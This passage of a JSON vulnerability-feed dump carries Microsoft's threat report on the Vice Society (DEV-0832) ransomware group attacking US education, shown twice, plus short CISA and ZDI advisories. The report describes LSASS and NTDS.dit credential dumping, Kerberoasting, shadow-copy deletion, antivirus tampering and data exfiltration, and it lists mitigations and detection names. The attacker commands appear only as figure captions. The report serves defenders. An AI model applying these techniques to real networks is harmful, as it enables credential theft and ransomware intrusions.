Windows local security authority subsystem (lsass.exe)](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)\n\n## Detection details\n\n### Microsoft Defender Antivirus\n\n[Microsoft Defender Antivirus](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows?view=o365-worldwide>) detects DEV-0832\u2019s Vice Society-branded Zeppelin variant as the following malware:\n\n * [Ransom:Win32/VSocCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/VSocCrypt.PA!MTB&threatId=-2147138765>)\n * [Trojan:PowerShell/VSocCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/VSocCrypt.PA!MTB&threatId=-2147136227>)\n * [Ransom:Linux/ViceSociety](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Linux/ViceSociety.D!MTB&threatId=-2147136262>)\n\nOther commodity ransomware variants previously leveraged by DEV-0832 are detected as:\n\n * [Behavior:Win32/Ransomware!Quantum.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Ransomware!Quantum.A&threatId=-2147147947>)\n * [Behavior:Win32/Quantum.AA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Quantum.AA&threatId=-2147147852>)\n * [Ransom:Win32/Zeppelin](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Zeppelin&threatId=-2147188430>)\n * [Ransom:Win32/Blackcat](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Blackcat&threatId=-2147158032>)\n\n_SystemBC_ and _PortStarter_ are detected as:\n\n * [Behavior:Win32/SystemBC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/SystemBC.A!nri&threatId=-2147149800>)\n * [Trojan:Win32/SystemBC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/SystemBC.SA!sms&threatId=-2147150468>)\n * [Backdoor:Win64/PortStarter](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win64/PortStarter&threatId=-2147137231>)\n\nSome pre-ransomware intrusion activity used in multiple campaigns by various activity groups can be detected generically. During identified DEV-0832 activity, associated command line activity was detected with generic detections, including:\n\n * Behavior:Win32/OfficeInjectingProc.A\n * Behavior:Win32/PsexecRemote.E\n * Behavior:Win32/SuspRemoteCopy.B\n * Behavior:Win32/PSCodeInjector.A\n * Behavior:Win32/REnamedPowerShell.A\n\n### Microsoft Defender for Endpoint\n\nThe following [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint?rtc=1>) alerts can indicate threat activity on your network:\n\n * DEV-0832 activity group\n * 'VSocCrypt' ransomware was prevented\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.\n\n * Use of living-off-the-land binary to run malicious code\n * Potential SystemBC execution via Windows Task Scheduler\n * Suspicious sequence of exploration activities\n * Process memory dump\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote activity\n * Suspicious access to LSASS service\n * Suspicious credential dump from NTDS.dit\n * File backups were deleted\n * System recovery setting tampering\n\nThe post [DEV-0832 (Vice Society) opportunistic ransomware campaigns impacting US education sector](<https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-25T16:00:00", "type": "mssecure", "title": "DEV-0832 (Vice Society) opportunistic ransomware campaigns impacting US education sector", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521"], "modified": "2022-10-25T16:00:00", "id": "MSSECURE:123BB884C96F0D2CEEB22B6F3B90BCB4", "href": "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2022-10-25T23:14:08", "description": "In recent months, Microsoft has detected active ransomware and extortion campaigns impacting the global education sector, particularly in the US, by a threat actor we track as DEV-0832, also known as Vice Society. Shifting ransomware payloads over time from [BlackCat](<https://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/>), [QuantumLocker](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>), and [Zeppelin](<https://www.cisa.gov/uscert/ncas/alerts/aa22-223a>), DEV-0832\u2019s latest payload is a Zeppelin variant that includes Vice Society-specific file extensions, such as _.v-s0ciety_, ._v-society_, and, most recently, _.locked_. In several cases, Microsoft assesses that the group did not deploy ransomware and instead possibly performed extortion using only exfiltrated stolen data.\n\nDEV-0832 is a cybercriminal group that has reportedly been active as early as June 2021. While the latest attacks between July and October 2022 have heavily impacted the education sector, DEV-0832\u2019s previous opportunistic attacks have affected various industries like local government and retail. Microsoft assesses that the group is financially motivated and continues to focus on organizations where there are weaker security controls and a higher likelihood of compromise and ransom payout. Before deploying ransomware, DEV-0832 relies on tactics, techniques, and procedures commonly used among other ransomware actors, including the use of PowerShell scripts, repurposed legitimate tools, exploits for publicly disclosed vulnerabilities for initial access and post-compromise elevation of privilege, and commodity backdoors like _SystemBC_.\n\nRansomware has evolved into a complex threat that\u2019s human-operated, adaptive, and focused on a wider scale, using data extortion as a monetization strategy to become even more impactful in recent years. To find easy entry and privilege escalation points in an environment, these attackers often take advantage of poor credential hygiene and legacy configurations or misconfigurations. Defenders can build a robust defense against ransomware by reading our [ransomware as a service blog](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>).\n\nIn this blog, we detail Microsoft\u2019s analysis of observed DEV-0832 activity, including the tactics and techniques used across the group\u2019s campaigns, with the goal of helping customers identify, investigate, and remediate activity in their environments. We provide hunting queries to help customers comprehensively search their environments for relevant indicators as well as protection and hardening guidance to help organizations increase resilience against these and similar attacks.\n\n## Who is DEV-0832 (Vice Society)?\n\nMicrosoft has identified multiple campaigns attributed to DEV-0832 over the past year based on the use of a unique PowerShell file name, staging directories, and ransom payloads and their accompanying notes. To gain an initial foothold in compromised networks, DEV-0832 has [reportedly exploited vulnerable web-facing applications and used valid accounts](<https://www.cisa.gov/uscert/ncas/alerts/aa22-249a>). However, due to limited initial signals from affected organizations, Microsoft has not confirmed these attack vectors. Attackers then use custom PowerShell scripts, commodity tools, exploits for disclosed vulnerabilities, and native Windows binaries to gather privileged credentials, move laterally, collect and exfiltrate data, and deploy ransomware.\n\nAfter deploying ransomware, DEV-0832 demands a ransom payment, threatening to leak stolen data on the group\u2019s _[.]onion_ site. In some cases, Microsoft observed that DEV-0832 did not deploy ransomware. Instead, the actors appeared to exfiltrate data and dwell within compromised networks. The group sometimes avoids a ransomware payload in favor of simple extortion\u2014threatening to release stolen data unless a payment is made.\n\nThe group also goes to significant measures to ensure that an organization cannot recover from the attack without paying the ransom: Microsoft has observed DEV-0832 access two domain administrator accounts and reset user passwords of over 150,000 users, essentially locking out legitimate users before deploying ransomware to some devices. This effectively interrupts remediation efforts, including attempts to prevent the ransomware payload or post-compromise incident response.\n\n### Toolset\n\n#### Ransomware payloads\n\nMicrosoft has observed DEV-0832 deploy multiple commodity ransomware variants over the past year: BlackCat, QuantumLocker, Zeppelin, and most recently a Vice Society-branded variant of the Zeppelin ransomware. While many ransomware groups have shifted away from branded file extensions in favor of randomly generated ones, DEV-0832 incorporated branding with their Vice Society variant using _.v-s0ciety_ or _.v-society_ file extensions. Most recently in late September 2022, DEV-0832 again modified their ransomware payload to a variant dubbed RedAlert, using a _.locked_ file extension.\n\nIn one July 2022 intrusion, Microsoft security researchers identified DEV-0832 attempt to deploy QuantumLocker binaries, then within five hours, attempt to deploy suspected Zeppelin ransomware binaries. Such an incident might suggest that DEV-0832 maintains multiple ransomware payloads and switches depending on target defenses or, alternatively, that dispersed operators working under the DEV-0832 umbrella might maintain their own preferred ransomware payloads for distribution. The shift from a [ransomware as a service](<https://aka.ms/ransomware-as-a-service>) (RaaS) offering (BlackCat) to a purchased wholly-owned malware offering (Zeppelin) and a custom Vice Society variant indicates DEV-0832 has active ties in the cybercriminal economy and has been testing ransomware payload efficacy or post-ransomware extortion opportunities.\n\nIn many intrusions, DEV-0832 stages their ransomware payloads in a hidden share on a Windows system, for example accessed via a share name containing \u201c$\u201d. Once DEV-0832 has exfiltrated data, they then distribute the ransomware onto local devices for launching, likely using group policy, as shown in the below command:\n\n![](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/Figure-1.-Group-policy-to-distribute-ransomware-onto-local-devices-1024x39.png)Figure 1. Group policy to distribute ransomware onto local devices\n\nThe group also has cross-platform capabilities: Microsoft identified the deployment of a Vice Society Linux Encryptor on a Linux ESXi server.\n\n#### PowerShell scripts\n\nDEV-0832 uses a PowerShell script to conduct a variety of malicious activities and make system-related changes within compromised networks. Like their ransomware payloads, DEV-0832 typically stages their PowerShell scripts on a domain controller.\n\nMicrosoft security researchers have observed several variations among identified DEV-0832 PowerShell scripts, indicating ongoing refinement and development over time\u2014while some only perform system discovery commands, other scripts are further modified to perform persistence, defense evasion, data exfiltration, and even distribute the ransomware payloads.\n\n#### Commodity tools\n\nAccording to Microsoft investigations, DEV-0832 has used two commodity backdoors in ransomware attacks: _SystemBC_ and _PortStarter_.\n\n_SystemBC_ is a post-compromise commodity remote access trojan (RAT) and proxy tool that has been incorporated into multiple diverse ransomware attacks. In one DEV-0832 intrusion, the attacker used both a compromised domain admin user account and a compromised contractor account to launch a PowerShell command that launched a _SystemBC_ session under the value name \u201csocks\u201d:\n\n![](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/Figure-2.-Powershell-command-launching-a-SystemBC-session-named-\u2018socks-1024x53.png)Figure 2. Powershell command launching a SystemBC session named \u2018socks\u2019\n\n_PortStarte_r is a backdoor written in Go. According to Microsoft analysis, this malware provides functionality such as modifying firewall settings and opening ports to connect to pre-configured command-and-control (C2) servers.\n\nDEV-0832 has also deployed ransomware payloads using the remote launching tool Power Admin. Power Admin is a legitimate tool that provides functionality to monitor servers and applications, as well as file access auditing. If an organization has enabled Console Security settings within Power Admin, an attacker must have credentials to make authorized changes.\n\nOther commodity tools identified in DEV-0832 attacks include Advanced Port Scanner and Advanced IP Scanner for network discovery.\n\n#### Abuse of legitimate tooling\n\nLike many other ransomware actors, DEV-0832 relies on misusing legitimate system tools to reduce the need to launch malware or malicious scripts that automated security solutions might detect. Observed tools include:\n\n * Use of the [Windows Management Instrumentation Command-line](<https://learn.microsoft.com/windows/win32/wmisdk/wmic>) (WMIC) to launch commands that delete Mongo databases, other backups, and security programs.\n * Use of Impacket\u2019s WMIexec functionality, an open-source tool to launch commands via WMI, and Impacket _atexec.py_, which launches commands using Task Scheduler.\n * Use of the [vssadmin](<https://learn.microsoft.com/windows-server/administration/windows-commands/vssadmin>) command to delete shadow copy backups on Windows Server.\n * Use of [PsExec](<https://learn.microsoft.com/sysinternals/downloads/psexec>) to remotely launch PowerShell, batch scripts, and deploy ransomware payloads\n\nAdditionally, in one identified intrusion, DEV-0832 attempted to turn off Microsoft Defender Antivirus using registry commands. [Enabling Microsoft Defender Antivirus tamper protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection>) helps block this type of activity.\n\n![table](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/Figure-3.-Registry-commands-that-attempt-to-tamper-with-Microsoft-Defender-antivirus-software.png)Figure 3. Registry commands that attempt to tamper with Microsoft Defender antivirus software\n\n### Harvesting privileged credentials for ransomware deployment\n\nLike other ransomware groups, after gaining an initial foothold within a network, DEV-0832 moves quickly to gather valid administrator local or domain credentials to ensure they can distribute ransomware payloads throughout the network for maximum impact.\n\n#### Credential dumps\n\nWhile Microsoft has not identified all the credential access techniques of DEV-0832, in many instances DEV-0832 accesses Local Security Authority Server Service (LSASS) dumps to obtain valid account credentials that were present in memory. Microsoft also observed that, instead of using a tool like Mimikatz to access a credential dump, DEV-0832 typically abuses the tool _comsvcs.dll_ along with MiniDump to dump the LSASS process memory. Other ransomware actors have been observed using the same technique. \n\nIn cases where DEV-0832 obtained domain-level administrator accounts, they accessed NTDS dumps for later cracking. The following command shows the attacker exfiltrating the _NTDS.dit_ file, which stores Active Directory data to an actor-created directory:\n\n![](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/Figure-4.-Example-of-attacker-command-to-exfiltrate-the-\u2018NTDS.dit-file-1024x38.png)Figure 4. Example of attacker command to exfiltrate the \u2018NTDS.dit\u2019 file\n\n#### Kerberoast\n\nMicrosoft has also identified DEV-0832 used the malicious PowerSploit module [_Invoke-Kerberoast_](<https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/>) to perform a Kerberoast attack, which is a post-exploitation technique used to obtain credentials for a service account from Active Directory Domain Services (AD DS). The _Invoke-Kerberoast_ module requests encrypted service tickets and returns them in an attacker-specified output format compatible with cracking tools. The group can use the cracked Kerberos hashes to reveal passwords for service accounts, often providing access to an account that has the equivalent of domain admin privileges. Furthermore, one Kerberos service ticket can have many associated service principal names (SPNs); successful Kerberoasting can then grant an attacker access to the SPNs\u2019 associated service or user accounts, such as obtaining ticket granting service (TGS) tickets for Active Directory SPNs that would allow an attacker to do offline password cracking.\n\nCombined with the fact that service account passwords are not usually set to expire and typically remain unchanged for a great length of time, attackers like DEV-0832 continue to rely on Kerberoasting in compromised networks. Microsoft 365 Defender blocks this attack with Antimalware Scan Interface (AMSI) and machine learning. Monitor for alerts that reference Kerberoast attacks closely as the presence of these alerts typically indicates a human adversary in your environment.\n\n#### Account creation\n\nIn one suspected DEV-0832 intrusion, Microsoft observed an operator create accounts that, based on the naming convention, were designed to blend in as admin accounts and allow persistence without malware, as shown in the following command:\n\n![](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/Figure-5.-Attacker-command-to-create-accounts.png)Figure 5. Attacker command to create accounts\n\nMonitoring newly created accounts can help identify this type of suspicious activity that does not rely on launching malware for persistence in the environment.\n\n#### Exploitation of privilege escalation vulnerabilities\n\nIn August 2022, Microsoft security researchers identified one file during a DEV-0832 intrusion indicating that the group has incorporated an exploit for the disclosed, patched security flaw [CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>) (Windows Common Log File System (CLFS) logical-error vulnerability). Microsoft released a patch in April 2022. The DEV-0832 file spawns a new _cmd.exe_ process with system privileges.\n\nAccording to public reporting, DEV-0832 has also incorporated exploits for the [PrintNightmare](<https://www.cisa.gov/uscert/ncas/alerts/aa22-249a>) vulnerability to escalate privileges in a domain. Combined with the CVE-2022-24521 exploit code, it is likely that DEV-0832, like many other adversaries, quickly incorporates available exploit code for disclosed vulnerabilities into their toolset to target unpatched systems.\n\n#### Lateral movement with valid accounts\n\nAfter gaining credentials, DEV-0832 frequently moves laterally within a network using Remote Desktop Protocol (RDP). And as previously mentioned, DEV-0832 has also used valid credentials to interact with remote network shares over Server Message Block (SMB) where they stage ransomware payloads and PowerShell scripts.\n\n### Data exfiltration\n\nIn one known intrusion, DEV-0832 operators exfiltrated hundreds of gigabytes of data by launching their PowerShell script, which was staged on a network share. The script contained hardcoded attacker-owned IP addresses and searched for wide-ranging, non-targeted keywords ranging from financial documents to medical information, while excluding files containing keywords such as varied antivirus product names or file artifact extensions. Given the wide range of keywords included in the script, it is unlikely that DEV-0832 regularly customizes it for each target.\n\nMicrosoft suspects that DEV-0832 uses legitimate tools Rclone and MegaSync for data exfiltration as well; many ransomware actors leverage these tools, which provide capabilities to upload files to cloud storage. DEV-0832 also uses file compression tools to collect data from compromised devices.\n\n## Mitigations\n\nApply these mitigations to reduce the impact of this threat:\n\n * Use [device discovery](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery>) to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n * Use [Microsoft Defender Vulnerability Management](<https://security.microsoft.com/vulnerabilities>) to assess your current status and deploy any updates that might have been missed.\n * Utilize [Microsoft Defender Firewall](<https://support.microsoft.com/windows/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f>), intrusion prevention devices, and your network firewall to prevent RPC and SMB communication among endpoints whenever possible. This limits lateral movement as well as other attack activities.\n * Turn on [cloud-delivered protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus>) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [endpoint detection and response (EDR) in block mode](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\n * Enable [investigation and remediation](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * [LSA protection](<https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection>) is enabled by default on new Windows 11 devices, hardening the platform against credential dumping techniques. LSA PPL protection will further restrict access to memory dumps making it hard to obtain credentials.\n * Refer to Microsoft\u2019s blog [Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#defending-against-ransomware>) for recommendations on building strong credential hygiene and other robust measures to defend against ransomware.\n\nMicrosoft customers can turn on [attack surface reduction rules](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction>) to prevent several of the infection vectors of this threat. These rules, which can be configured by any administrator, offer significant hardening against ransomware attacks. In observed attacks, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:\n\n * [Block process creations originating from PsExec and WMI commands](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?#block-process-creations-originating-from-psexec-and-wmi-commands>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Use advanced protection against ransomware](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#use-advanced-protection-against-ransomware>)\n * [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)\n\n## Detection details\n\n### Microsoft Defender Antivirus\n\n[Microsoft Defender Antivirus](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows?view=o365-worldwide>) detects DEV-0832\u2019s Vice Society-branded Zeppelin variant as the following malware:\n\n * [Ransom:Win32/VSocCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/VSocCrypt.PA!MTB&threatId=-2147138765>)\n * [Trojan:PowerShell/VSocCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/VSocCrypt.PA!MTB&threatId=-2147136227>)\n * [Ransom:Linux/ViceSociety](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Linux/ViceSociety.D!MTB&threatId=-2147136262>)\n\nOther commodity ransomware variants previously leveraged by DEV-0832 are detected as:\n\n * [Behavior:Win32/Ransomware!Quantum.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Ransomware!Quantum.A&threatId=-2147147947>)\n * [Behavior:Win32/Quantum.AA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Quantum.AA&threatId=-2147147852>)\n * [Ransom:Win32/Zeppelin](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Zeppelin&threatId=-2147188430>)\n * [Ransom:Win32/Blackcat](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Blackcat&threatId=-2147158032>)\n\n_SystemBC_ and _PortStarter_ are detected as:\n\n * [Behavior:Win32/SystemBC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/SystemBC.A!nri&threatId=-2147149800>)\n * [Trojan:Win32/SystemBC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/SystemBC.SA!sms&threatId=-2147150468>)\n * [Backdoor:Win64/PortStarter](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win64/PortStarter&threatId=-2147137231>)\n\nSome pre-ransomware intrusion activity used in multiple campaigns by various activity groups can be detected generically. During identified DEV-0832 activity, associated command line activity was detected with generic detections, including:\n\n * Behavior:Win32/OfficeInjectingProc.A\n * Behavior:Win32/PsexecRemote.E\n * Behavior:Win32/SuspRemoteCopy.B\n * Behavior:Win32/PSCodeInjector.A\n * Behavior:Win32/REnamedPowerShell.A\n\n### Microsoft Defender for Endpoint\n\nThe following [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint?rtc=1>) alerts can indicate threat activity on your network:\n\n * DEV-0832 activity group\n * 'VSocCrypt' ransomware was prevented\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.\n\n * Use of living-off-the-land binary to run malicious code\n * Potential SystemBC execution via Windows Task Scheduler\n * Suspicious sequence of exploration activities\n * Process memory dump\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote activity\n * Suspicious access to LSASS service\n * Suspicious credential dump from NTDS.dit\n * File backups were deleted\n * System recovery setting tampering\n\nThe post [DEV-0832 (Vice Society) opportunistic ransomware campaigns impacting US education sector](<https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-25T16:00:00", "type": "mmpc", "title": "DEV-0832 (Vice Society) opportunistic ransomware campaigns impacting US education sector", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521"], "modified": "2022-10-25T16:00:00", "id": "MMPC:123BB884C96F0D2CEEB22B6F3B90BCB4", "href": "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-04-20T11:28:33", "description": "Microsoft has released [an advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26809>) to address CVE-2022-26809, a critical remote code execution vulnerability in Remote Procedure Call Runtime Library. A remote, unauthenticated attacker could exploit this vulnerability to take control of an affected system. \n\nCISA encourages users and administrators to review [Microsoft\u2019s advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26809>) and apply the recommended mitigations.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/04/13/microsoft-releases-advisory-address-critical-remote-code-execution>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T00:00:00", "type": "cisa", "title": "Microsoft Releases Advisory to Address Critical Remote Code Execution Vulnerability (CVE-2022-26809) ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-04-13T00:00:00", "id": "CISA:A4C48C3DF384DD6E6CE086DAF7BAE679", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/04/13/microsoft-releases-advisory-address-critical-remote-code-execution", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2023-05-23T15:49:08", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the User Profile Service. By creating a directory junction, an attacker can abuse the service to delete a directory. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "zdi", "title": "Microsoft Windows User Profile Service Directory Junction Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-11T00:00:00", "id": "ZDI-21-966", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-966/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], 